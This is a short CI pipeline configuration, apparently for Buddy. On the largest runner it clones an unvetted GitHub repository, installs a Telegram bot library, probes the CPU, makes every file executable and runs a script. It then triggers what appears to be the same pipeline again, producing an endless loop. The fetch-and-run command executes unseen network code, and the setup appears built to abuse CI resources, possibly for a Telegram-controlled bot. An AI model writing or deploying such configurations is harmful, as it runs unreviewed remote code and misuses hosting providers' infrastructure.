- pipeline: "Pipeline"
  on: "CLICK"
  refs:
  - ":default"
  fail_on_prepare_env_warning: true
  resources: "X2LARGE"
  actions:
  - action: "git clone https://github.com/aaduopl/Aa && cd Aa && pip install telebot pymongo aiohttp && lscpu && chmod +x * && python3 m.py"
    type: "BUILD"
    docker_image_name: "library/python"
    docker_image_tag: "3.13"
    execute_commands:
    - "git clone https://github.com/aaduopl/Aa && cd Aa && pip install telebot pymongo aiohttp && lscpu && chmod +x * && python3 m.py"
    cached_dirs:
    - "/root/.cache/pip"
    shell: "BASH"
  - action: "Run aa/Pipeline"
    type: "RUN_NEXT_PIPELINE"
    wait: true
    comment: "Triggered by $BUDDY_PIPELINE_NAME execution #$BUDDY_RUN_ID"
    priority: "NORMAL"
    next_project_name: "aa"
    next_pipeline_name: "Pipeline"
